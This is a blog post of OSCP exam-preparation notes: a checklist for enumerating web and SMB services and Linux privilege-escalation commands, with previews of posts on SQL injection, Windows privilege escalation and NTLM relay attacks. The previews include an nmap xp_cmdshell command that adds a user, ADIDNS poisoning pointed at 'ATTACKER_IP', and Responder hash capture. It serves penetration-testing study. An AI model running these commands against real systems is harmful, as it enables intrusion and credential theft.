Skip to main content

Things to Remember for OSCP

 
All links for OSCP  Windows Enum  Linux - Enum   

Windows Priv Esc Cheatsheet   Windows Priv Esc Guif.re   

CVE-Exploits                
1) Start Screen Recording using OBS Screen Recorder

2) Check the Machine IP's 
         -   Start Timer (Dont Stay on a Single Machine for too Long) 
         -   Cracked a Machine - Restart the Timer 

3) Start Buffer overflow on the test machine 
         -  Start NmapAutomator on all 4 machines before starting BOF on test

4) Take Screenshots of everything 

5) Start with 10 Points Box after BOF(25 Points); If this is taking too long,
   switch to a new box. Come back to this later. Document Everything.

6) HTTP is Vulnerable Most of the times - start with HTTP 
        - Start nikto, dirb,dirsearch, dirbuster - extensions 
        - robots.txt, config.php, license.txt 
        - Try Default Creds - if the creds doesnt work - try searching for creds for sometime 
        - Try Cewl --> use it for brute forcing 
        - Check for the running application version 
        - Google the application for finding version & exploits 
        - Dont just rely on Searchsploit, search on google as well. 
        - Check Github Exploits as well, read the exploit properly
        - Run wpscan,droopscan if they are found - search for vuln plugins,version 
        - Search for LFI / RFI - got a doubt - Check PDF/ Videos MORE LFI
        - Check for SQL Injections 
        - Check this out for web vulns
        - Check for Tomcat, web.config, cgi-bin exploits
        - 
7) Checks all ports - do a full nmap scan, if u think something is missing 

8) Always check for nmap vulns 
9) Check SMB port 
  1. If linux machine has smb - check version and exploit it
  2. use smbclient without password and null login as well
  3. Smb SCF file exploit - Using Responder, might not be for exam
10) Privilege Escalation: 

Linux: Few methods available here 
  1. uname -a
  2. sudo -l
  3. sudo su
  4. find / -perm -4000 2>/dev/null | xargs ls -la //Files with root privs
  5. ls -la /etc/passwd
  6. cd /var/www/
  7. cd /var/backups/
  8. search for config files
  9. ps aux | grep root
  10. netstat -ano
  11. netstat -tulpn
  12. search for writable files
  13. path exploit
  14. cron jobs - pspy
  15. check ./bash_hisroty
  16. mysql running as root ?
  17. cat /etc/fstab
  18. cat /dev/sdb
  19. pspy -f /check for running file system tasks
  20. check file permissions -> you are folder owner & file inside is running as roo
  21. Check for unknown binaries
    1. file binary
    2. strings binary
    3. cat binary
    4. ls -la binary
    5. Check the file to see if its executing any commands.
    6. Check for the file paths;
    7. If the command is cat instead of /bin/cat --> path injection might be possible
    8. decrease the size of terminal and check for changes
    9. less binary
    10. ./binary | less //Try Getting an Interactive shell with less
      1. Then !Command to execute the command,
      2. it might only work with a definite screen size
    11. ./binary anycommand && /bin/bash
Windows:


Download the Exam Report & Lab Report Template Here











Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Relay Attacks

Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/